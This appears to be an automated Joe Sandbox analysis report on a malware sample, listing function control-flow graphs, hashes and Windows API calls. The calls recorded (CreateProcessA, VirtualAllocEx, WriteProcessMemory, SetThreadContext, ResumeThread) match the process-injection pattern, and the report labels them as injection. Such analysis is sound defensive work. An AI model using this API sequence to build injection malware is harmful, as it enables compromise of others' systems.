                                                                        control_flow_graph 1469 81b1170-81b1205 1471 81b123e-81b125e 1469->1471 1472 81b1207-81b1211 1469->1472 1477 81b1260-81b126a 1471->1477 1478 81b1297-81b12c6 1471->1478 1472->1471 1473 81b1213-81b1215 1472->1473 1475 81b1238-81b123b 1473->1475 1476 81b1217-81b1221 1473->1476 1475->1471 1479 81b1223 1476->1479 1480 81b1225-81b1234 1476->1480 1477->1478 1481 81b126c-81b126e 1477->1481 1488 81b12c8-81b12d2 1478->1488 1489 81b12ff-81b13b9 CreateProcessA 1478->1489 1479->1480 1480->1480 1482 81b1236 1480->1482 1483 81b1291-81b1294 1481->1483 1484 81b1270-81b127a 1481->1484 1482->1475 1483->1478 1486 81b127e-81b128d 1484->1486 1487 81b127c 1484->1487 1486->1486 1490 81b128f 1486->1490 1487->1486 1488->1489 1491 81b12d4-81b12d6 1488->1491 1500 81b13bb-81b13c1 1489->1500 1501 81b13c2-81b1448 1489->1501 1490->1483 1493 81b12f9-81b12fc 1491->1493 1494 81b12d8-81b12e2 1491->1494 1493->1489 1495 81b12e6-81b12f5 1494->1495 1496 81b12e4 1494->1496 1495->1495 1497 81b12f7 1495->1497 1496->1495 1497->1493 1500->1501 1511 81b144a-81b144e 1501->1511 1512 81b1458-81b145c 1501->1512 1511->1512 1515 81b1450 1511->1515 1513 81b145e-81b1462 1512->1513 1514 81b146c-81b1470 1512->1514 1513->1514 1516 81b1464 1513->1516 1517 81b1472-81b1476 1514->1517 1518 81b1480-81b1484 1514->1518 1515->1512 1516->1514 1517->1518 1519 81b1478 1517->1519 1520 81b1496-81b149d 1518->1520 1521 81b1486-81b148c 1518->1521 1519->1518 1522 81b149f-81b14ae 1520->1522 1523 81b14b4 1520->1523 1521->1520 1522->1523 1524 81b14b5 1523->1524 1524->1524
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081B13A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 1b856d0456c9335721864d99ee4ebaa91ae625a872242b091f354e39325191ce
                                                                        • Instruction ID: caf238f79ea20ce472369a8bab966a525b25265cf722588f20a5fb531d7bf50e
                                                                        • Opcode Fuzzy Hash: 1b856d0456c9335721864d99ee4ebaa91ae625a872242b091f354e39325191ce
                                                                        • Instruction Fuzzy Hash: A3918D71D00259DFDF14CFA8C851BEDBBB2BF48311F1581A9E808A7240EB759985CFA1
                                                                        Function 0109AD68 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1526 109ad68-109ad77 1527 109ad79-109ad86 call 109a08c 1526->1527 1528 109ada3-109ada7 1526->1528 1535 109ad88 1527->1535 1536 109ad9c 1527->1536 1529 109ada9-109adb3 1528->1529 1530 109adbb-109adfc 1528->1530 1529->1530 1537 109ae09-109ae17 1530->1537 1538 109adfe-109ae06 1530->1538 1581 109ad8e call 109aff0 1535->1581 1582 109ad8e call 109b000 1535->1582 1536->1528 1540 109ae19-109ae1e 1537->1540 1541 109ae3b-109ae3d 1537->1541 1538->1537 1539 109ad94-109ad96 1539->1536 1543 109aed8-109af98 1539->1543 1544 109ae29 1540->1544 1545 109ae20-109ae27 call 109a098 1540->1545 1542 109ae40-109ae47 1541->1542 1546 109ae49-109ae51 1542->1546 1547 109ae54-109ae5b 1542->1547 1576 109af9a-109af9d 1543->1576 1577 109afa0-109afcb GetModuleHandleW 1543->1577 1548 109ae2b-109ae39 1544->1548 1545->1548 1546->1547 1551 109ae68-109ae71 call 109a0a8 1547->1551 1552 109ae5d-109ae65 1547->1552 1548->1542 1557 109ae7e-109ae83 1551->1557 1558 109ae73-109ae7b 1551->1558 1552->1551 1560 109aea1-109aea5 1557->1560 1561 109ae85-109ae8c 1557->1561 1558->1557 1563 109aeab-109aeae 1560->1563 1561->1560 1562 109ae8e-109ae9e call 109a0b8 call 109a0c8 1561->1562 1562->1560 1566 109aed1-109aed7 1563->1566 1567 109aeb0-109aece 1563->1567 1567->1566 1576->1577 1578 109afcd-109afd3 1577->1578 1579 109afd4-109afe8 1577->1579 1578->1579 1581->1539 1582->1539
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0109AFBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 482d731980b28945ec8b550cfa6df2e0b1eb64b6589ec851727d0e85342ca7ca
                                                                        • Instruction ID: 44ce89b0c2327b26530103765e70a4590546033a57bf7fe327bbbd449c356322
                                                                        • Opcode Fuzzy Hash: 482d731980b28945ec8b550cfa6df2e0b1eb64b6589ec851727d0e85342ca7ca
                                                                        • Instruction Fuzzy Hash: 72713370A00B05CFDB64DF29D05579ABBF1BF88304F008A6DE48AD7A50DB75E949CBA0
                                                                        Function 051718E4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1583 51718e4-5171956 1584 5171961-5171968 1583->1584 1585 5171958-517195e 1583->1585 1586 5171973-5171a12 CreateWindowExW 1584->1586 1587 517196a-5171970 1584->1587 1585->1584 1589 5171a14-5171a1a 1586->1589 1590 5171a1b-5171a53 1586->1590 1587->1586 1589->1590 1594 5171a55-5171a58 1590->1594 1595 5171a60 1590->1595 1594->1595 1596 5171a61 1595->1596 1596->1596
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05171A02
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1751557922.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5170000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 9cddcdbed4a6def088be87d0a9e8a6a4a31de0703f98992020d5f309ae710208
                                                                        • Instruction ID: b81516501de4aeaf79c3263340b74f29111e1d946cc504a832e09c28710ae172
                                                                        • Opcode Fuzzy Hash: 9cddcdbed4a6def088be87d0a9e8a6a4a31de0703f98992020d5f309ae710208
                                                                        • Instruction Fuzzy Hash: 8951C0B1D00349EFDF14CF99C984ADEBBB5BF48310F24812AE819AB210D7759985CF90
                                                                        Function 051718F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1597 51718f0-5171956 1598 5171961-5171968 1597->1598 1599 5171958-517195e 1597->1599 1600 5171973-5171a12 CreateWindowExW 1598->1600 1601 517196a-5171970 1598->1601 1599->1598 1603 5171a14-5171a1a 1600->1603 1604 5171a1b-5171a53 1600->1604 1601->1600 1603->1604 1608 5171a55-5171a58 1604->1608 1609 5171a60 1604->1609 1608->1609 1610 5171a61 1609->1610 1610->1610
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05171A02
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1751557922.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5170000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 140ea80132b29b5e5fa6e4879ac2489b28ed7a158be300fa7bde6c5be2706045
                                                                        • Instruction ID: e79ffb2665070b4182ea39a26f623acb8fd351f429d1913d25289ab1e080eb66
                                                                        • Opcode Fuzzy Hash: 140ea80132b29b5e5fa6e4879ac2489b28ed7a158be300fa7bde6c5be2706045
                                                                        • Instruction Fuzzy Hash: 3A4190B1D10349EFDF14CF99C984ADEBBB5BF48310F24852AE819AB210D7759985CF90
                                                                        Function 010944B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1611 10944b4-10959d9 CreateActCtxA 1614 10959db-10959e1 1611->1614 1615 10959e2-1095a3c 1611->1615 1614->1615 1622 1095a4b-1095a4f 1615->1622 1623 1095a3e-1095a41 1615->1623 1624 1095a51-1095a5d 1622->1624 1625 1095a60 1622->1625 1623->1622 1624->1625 1626 1095a61 1625->1626 1626->1626
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 010959C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 203dfb09d0b854c3876766120427688bcdc12817807a3d94348aaf7946b0985e
                                                                        • Instruction ID: f10604401c916496009169bf5abaa892d2cd6408c0ab1b1dc1dd3182665391b5
                                                                        • Opcode Fuzzy Hash: 203dfb09d0b854c3876766120427688bcdc12817807a3d94348aaf7946b0985e
                                                                        • Instruction Fuzzy Hash: F941FFB0C00729CBDF25DFAAC885B9DBBF5BF48304F20806AD408AB251DB756945DF90
                                                                        Function 0109590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1628 109590c-10959d9 CreateActCtxA 1630 10959db-10959e1 1628->1630 1631 10959e2-1095a3c 1628->1631 1630->1631 1638 1095a4b-1095a4f 1631->1638 1639 1095a3e-1095a41 1631->1639 1640 1095a51-1095a5d 1638->1640 1641 1095a60 1638->1641 1639->1638 1640->1641 1642 1095a61 1641->1642 1642->1642
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 010959C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 97b2393ea0e0bf2e4eaff1d7b48c2a069bdde864374155382f0a6458499c870b
                                                                        • Instruction ID: e1bcbf92d834d551f5c798a1a619b0db50ababa2c9e0465ce187696693749ad6
                                                                        • Opcode Fuzzy Hash: 97b2393ea0e0bf2e4eaff1d7b48c2a069bdde864374155382f0a6458499c870b
                                                                        • Instruction Fuzzy Hash: 1841DEB1C00729CBDB25CFAAC895BDDBBF5BF48304F24846AD448AB250DB796946CF50
                                                                        Function 05174040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1644 5174040-517407c 1645 5174082-5174087 1644->1645 1646 517412c-517414c 1644->1646 1647 51740da-5174112 CallWindowProcW 1645->1647 1648 5174089-51740c0 1645->1648 1652 517414f-517415c 1646->1652 1650 5174114-517411a 1647->1650 1651 517411b-517412a 1647->1651 1655 51740c2-51740c8 1648->1655 1656 51740c9-51740d8 1648->1656 1650->1651 1651->1652 1655->1656 1656->1652
                                                                        APIs
                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05174101
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1751557922.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5170000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: 7551a9222a5afad1314f83e10748bead5e7381b3a1b91b65b52e918979f214a0
                                                                        • Instruction ID: 0e5588416fe23fb23777a16df907cb7471af3d0b775d414df612f68f779494ca
                                                                        • Opcode Fuzzy Hash: 7551a9222a5afad1314f83e10748bead5e7381b3a1b91b65b52e918979f214a0
                                                                        • Instruction Fuzzy Hash: F84106B5A00349CFCB14CF99C848AAAFBF5FB88314F258459E519AB321D775A841CFA0
                                                                        Function 081B0EE0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1658 81b0ee0-81b0f36 1660 81b0f38-81b0f44 1658->1660 1661 81b0f46-81b0f85 WriteProcessMemory 1658->1661 1660->1661 1663 81b0f8e-81b0fbe 1661->1663 1664 81b0f87-81b0f8d 1661->1664 1664->1663
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 081B0F78
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 4238be936d8463d72ac0a7707075d50a52b2f48f812a4b042facc1f8f99572c6
                                                                        • Instruction ID: 6775f60fb1b701183240e7041b850a1e86e1d441bfd5bca561732ae819f8f9d8
                                                                        • Opcode Fuzzy Hash: 4238be936d8463d72ac0a7707075d50a52b2f48f812a4b042facc1f8f99572c6
                                                                        • Instruction Fuzzy Hash: F72124719002499FCB10CFA9C985BEEBFF5FF48320F14842DE919A7250D7789940CBA5
                                                                        Function 081B0EE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1668 81b0ee8-81b0f36 1670 81b0f38-81b0f44 1668->1670 1671 81b0f46-81b0f85 WriteProcessMemory 1668->1671 1670->1671 1673 81b0f8e-81b0fbe 1671->1673 1674 81b0f87-81b0f8d 1671->1674 1674->1673
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 081B0F78
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: d3c4c1cae133c4e5c294abb1e60686408e7d1b15261aac6e53c1e65969942d64
                                                                        • Instruction ID: edf0a422e94cb04675f45a66c94d38839fde233163315bc4ce80623f66ca888a
                                                                        • Opcode Fuzzy Hash: d3c4c1cae133c4e5c294abb1e60686408e7d1b15261aac6e53c1e65969942d64
                                                                        • Instruction Fuzzy Hash: CE2125719003599FDB10CFAAC981BEEBBF5FF48320F14842EE919A7240D7799940CBA5
                                                                        Function 081B0D49 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1678 81b0d49-81b0d9b 1680 81b0dab-81b0ddb Wow64SetThreadContext 1678->1680 1681 81b0d9d-81b0da9 1678->1681 1683 81b0ddd-81b0de3 1680->1683 1684 81b0de4-81b0e14 1680->1684 1681->1680 1683->1684
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081B0DCE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 72506d7fbd46ec32d88c4272e72eb3cba3917b20e464006c22f89f6561122433
                                                                        • Instruction ID: be9258638f120e6c13a5cb5d239a18f91e8c574ac0a91714cba526cae759838a
                                                                        • Opcode Fuzzy Hash: 72506d7fbd46ec32d88c4272e72eb3cba3917b20e464006c22f89f6561122433
                                                                        • Instruction Fuzzy Hash: B22157719002498FDB10CFAAC484BEEBFF4EF88320F14842ED459A7241D778A945CFA0
                                                                        Function 081B0FD0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081B1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: b1f7de0ff6a48a6cecbc58af69ce82232e15094707f1adf1f9cad27f7fc547c9
                                                                        • Instruction ID: d7bc4e0323a9e718db46f873a537620cc2f8c353ee1743507bb4fbaf73c7ea5c
                                                                        • Opcode Fuzzy Hash: b1f7de0ff6a48a6cecbc58af69ce82232e15094707f1adf1f9cad27f7fc547c9
                                                                        • Instruction Fuzzy Hash: 2E2155718003899FCB10CFAAC880AEEBBF4FF48320F14842EE419A7250D7799900CBA0
                                                                        Function 0109D23C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0109D616,?,?,?,?,?), ref: 0109D6D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: f3ae4d6590341c76f0fe4cc2467d94d3dd789c4cb82ca1d0b6b09d5d7a6665f0
                                                                        • Instruction ID: 065e95ec103a377fc564c6b32564d71a763575a1273bab2553927b9d1726dcfd
                                                                        • Opcode Fuzzy Hash: f3ae4d6590341c76f0fe4cc2467d94d3dd789c4cb82ca1d0b6b09d5d7a6665f0
                                                                        • Instruction Fuzzy Hash: E32114B5900248DFDB10CF9AD984AEEFFF8EB48320F14841AE918A7310D375A940CFA4
                                                                        Function 081B0D50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081B0DCE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 487ef07f66414e8e5aa05c4bd022e2f49f1e778785f1dfcb5b9388368c1a4a1e
                                                                        • Instruction ID: 3e4b7d42e6791cf93929af68b792ab1c4053aee9e9e08c75ab4ebcea21a9880d
                                                                        • Opcode Fuzzy Hash: 487ef07f66414e8e5aa05c4bd022e2f49f1e778785f1dfcb5b9388368c1a4a1e
                                                                        • Instruction Fuzzy Hash: 552138719006498FDB10CFAAC4857EEBBF4EF88324F14842AD419A7240DB78A945CFA4
                                                                        Function 081B0FD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081B1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: f892d0737910d89c305055fde65a90e71bb7deb4a5e718cd044e9a6428b5ec64
                                                                        • Instruction ID: 8606f60cdb331200eca5d26fa06c9ba4c2ff786be131dbd7ea44cca29ba09f31
                                                                        • Opcode Fuzzy Hash: f892d0737910d89c305055fde65a90e71bb7deb4a5e718cd044e9a6428b5ec64
                                                                        • Instruction Fuzzy Hash: 682137B1D003499FDB10CFAAC980AEEFBF5FF48320F54842AE519A7240D7799940DBA4
                                                                        Function 0109D648 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0109D616,?,?,?,?,?), ref: 0109D6D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: d0344bda241ada222e0f9e9b15a104aeaaf0d495e3e47447d66745f2f9967cf0
                                                                        • Instruction ID: 15f300f945ee5b38ff3afd7429af4b974a9445b9cf578e55c65cc155bb79088e
                                                                        • Opcode Fuzzy Hash: d0344bda241ada222e0f9e9b15a104aeaaf0d495e3e47447d66745f2f9967cf0
                                                                        • Instruction Fuzzy Hash: 5021E4B5D00248DFDB10CF9AD984ADEBBF5EB48320F14841AE919A7350D378A954CFA4
                                                                        Function 081B0E21 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 081B0E96
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: cbda476083292424b5d10ba0c18e9c159cdd03fb51d3a2290aa066a868570017
                                                                        • Instruction ID: 5d3bde0b1a1d7252d0aedf5f469ee612715fabeed5e198e6571fa99043235660
                                                                        • Opcode Fuzzy Hash: cbda476083292424b5d10ba0c18e9c159cdd03fb51d3a2290aa066a868570017
                                                                        • Instruction Fuzzy Hash: 811159729002498FDF10DFAAD944AEFBFF5EF88320F248819E41AA7250C7769544CFA0
                                                                        Function 08204FDF Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 771ca4ea1a09982558b8ac26348680eb79ea51640e1131a7a6fd52d20df98a0f
                                                                        • Instruction ID: aa43b6c741928c560ef5784e2dcc5fc2e289bd6c7aac42d73fe10182d459fb3e
                                                                        • Opcode Fuzzy Hash: 771ca4ea1a09982558b8ac26348680eb79ea51640e1131a7a6fd52d20df98a0f
                                                                        • Instruction Fuzzy Hash: E1E19374E14219CFDB54CFA8C981A9DBBF2FB49315F2481AAD818E7346DB31A981CF50
                                                                        Function 081B0E28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 081B0E96
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 9b48096b8400d881288473abc9db81e5886febe677e010724daaebae50a67120
                                                                        • Instruction ID: bd3b3c26118dbdfec37c479b5aa398de83596ee8d992dbfe31b5ceffcfcfd953
                                                                        • Opcode Fuzzy Hash: 9b48096b8400d881288473abc9db81e5886febe677e010724daaebae50a67120
                                                                        • Instruction Fuzzy Hash: CB1137729002499FDB10DFAAC944AEFBFF5EF88320F148819E529A7250C7759940CFA0
                                                                        Function 081B0C99 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 0319a6cf3b48199beddb59f695053a179bcc6a5fc00f2aa2e360a8f8050f923d
                                                                        • Instruction ID: c3a1d17b69ac31c6b02396b85020a1e4bd1035fcbe31d7527b218de787659b76
                                                                        • Opcode Fuzzy Hash: 0319a6cf3b48199beddb59f695053a179bcc6a5fc00f2aa2e360a8f8050f923d
                                                                        • Instruction Fuzzy Hash: CE1128B19006898FDB10DFAAD4457EEFFF4EF98324F24881ED419A7240DB796944CBA4
                                                                        Function 081B0CA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: afb540c731ac4d14e5a0bdf3b2c198622953a230c59539ad5df54c83644210e6
                                                                        • Instruction ID: 49413edfc538ad6ae8a66176ff10468baab51ce7e4e9f80739a3ae419a9002c4
                                                                        • Opcode Fuzzy Hash: afb540c731ac4d14e5a0bdf3b2c198622953a230c59539ad5df54c83644210e6
                                                                        • Instruction Fuzzy Hash: 07113AB1D006498FDB10DFAAC4457EFFBF8EF88324F248419D419A7240DB75A940CBA4
                                                                        Function 081B47F8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 081B485D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 7cf9005682b1ef48cd5f5647820f540133a6db65daa38a70947190f3878dd570
                                                                        • Instruction ID: 1022bc1ad346eef69b3068c83627a92475f0d4b0974ef413bd6dd4bf3eb8909c
